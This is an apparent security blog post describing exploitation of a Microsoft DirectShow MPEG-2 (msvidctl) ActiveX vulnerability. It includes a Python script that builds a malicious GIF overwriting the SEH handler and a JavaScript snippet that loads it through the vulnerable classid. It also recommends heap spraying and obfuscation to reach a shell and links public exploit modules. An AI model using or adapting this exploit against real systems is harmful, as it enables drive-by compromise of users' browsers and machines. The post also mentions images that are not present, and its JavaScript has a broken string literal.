10 Jul
Microsft Directshow and MPEG-2 Exploitation
hello we are really sorry for too late updates.
but we are busy but i have some good news and i will share with you soon . for now i want to have short talk about new DirectShow vulnerabilities one of this vulnerability is more fun and exploited in the wild in past days .and now exploit is available in the wild.
anyway here is orginal advisory (another good vulnerability from alex wheeler):
http://www.microsoft.com/technet/security/advisory/972890.mspx
this vulnerability can be exploit using varient browser exploitation method like Heap Spray.
and flowing simple script can trigger vulnerabilty :
#!/usr/bin/python import sys , os gif = "\x00\x03\x00\x00\x11\x20\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" gif += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" gif += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" gif += "\xFF\xFF\xFF\xFF" # End of SEH chain gif += "\x41\x41\x41\x41" # SE Handler gif += "\x00" fp = open("directshow.gif","wb") fp.write(gif) fp.close() |
var myObject=document.createElement('object'); DivID.appendChild(myObject); myObject.width='1'; myObject.height='1'; myObject.data='directshow.gif; // Vulnerable ID myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF'; |
here you can see overwritten SEH
and here you can see Spared Heap
finally as you can see here we got a shell
using methods like java-script obfuscation and shirking variables can make this exploit more dangerous . and you can find this exploit at :
http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/browser/msvidctl_mpeg2.rb
and:
http://milw0rm.com/exploits/9108
Happy Hunting.
PS : i will try to have a technical post soon as soon possible
Cheers .
shahin
